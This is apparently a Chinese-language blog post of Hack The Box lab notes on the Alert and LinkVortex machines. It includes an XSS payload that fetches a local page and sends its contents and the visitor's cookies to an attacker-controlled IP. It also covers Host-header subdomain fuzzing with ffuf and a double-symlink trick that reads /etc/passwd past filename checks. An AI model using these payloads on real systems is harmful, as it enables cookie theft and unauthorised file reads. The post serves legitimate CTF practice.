[HTB]第二章

最近终于有空来玩玩HTB啦，时隔半年的HTB笔记也终于又更新了。本篇靶机为Alert和Linkvortex

xss回连测试与数据带回

可以用下面这段简单测试xss是否存在bot访问从而进行回连

<script>location="http://ip"</script>

如果存在，就可以用fetch进行外带，达到类似CSRF的效果

<script>
  var readfile="http://127.0.0.1/index.php";//改一下page就好
  fetch(readfile)
    .then(response => response.text())
    .then(data => {     
      fetch("http://ip/?data=" + encodeURIComponent(data)+"&cookie="+document.cookie);//改成你的ip
    })
    .catch(error => fetch("http://ip/?err="+error.message));
</script>

apache2默认配置文件路径

/etc/apache2/sites-available/000-default.conf

.htpasswd

这是一个和.htaccess类似的apache用户级配置文件，可以配合apache认证功能来模拟一个简单的登录认证。这个文件就是用来存放账号密码的。明文，可以直接查看

linpeas参数

-o参数是个很好用的参数，可以指定输出一些东西，因为linpeas的东西实在太杂了

一般intersting_perms_files是个不错的选择

同时，拿到foothood后观察一下127.1的端口也是个很值得关注的点

groups

这是一条指令，可以查看当前用户和所在组。当然如果环境中没有这个软件，也可以用cat /etc/groups | grep "akaRed"，是等效的

Dockerfile

有时候githack下来的dockerfile会说使用了什么配置文件去build，配置文件里可能会有密码之类的

HOST头FUZZ

有时候需要fuzz子域，但是在不知道的情况下又没dns咋办？去fuzz host头就行

ffuf -u "http://ip" -w /usr/.../dns.txt -H "HOST: FUZZ.???.???" -ac

关于ffuf的使用可以看下面一条。这里也顺便记录一个子域字典吧:/usr/share/dnsenum/dns.txt

不得不说kali的自带字典虽然藏得深但是真的全

ffuf

wfuzz日常没法用的一天= =

现在我投靠了这个新的fuzz工具，一样kali自带

格式如下，很方便很好记

ffuf -u "http://ip/FUZZ" -w /usr/.../dns.txt -fc/-ac

-fc和-ac选一个就行，-fc是过滤你不要的，比如-fc 404。-ac是自动过滤软件自己觉得没用的

软链接绕过名字检查

好像上一篇HTB记录过，但是上一篇是为了让检测软件误认为自己打开的是pdf实则是我们定向的文件，检测软件并没有对定向过后的文件做检查

但这里要介绍的是，如果做了定向后的检查，只要套了两层软连接，就可以绕过一些文件名检查。这里的漏洞就在于软件一般只追踪一层，而不会去看下一层

比如要你只能打开png图片，那么我只要像下面这样包，就检测不到了

ln -s /etc/passwd 2.png
ln -s 1.png 2.png

小tips

要注意观察每个文件夹的读写执行权限和所属组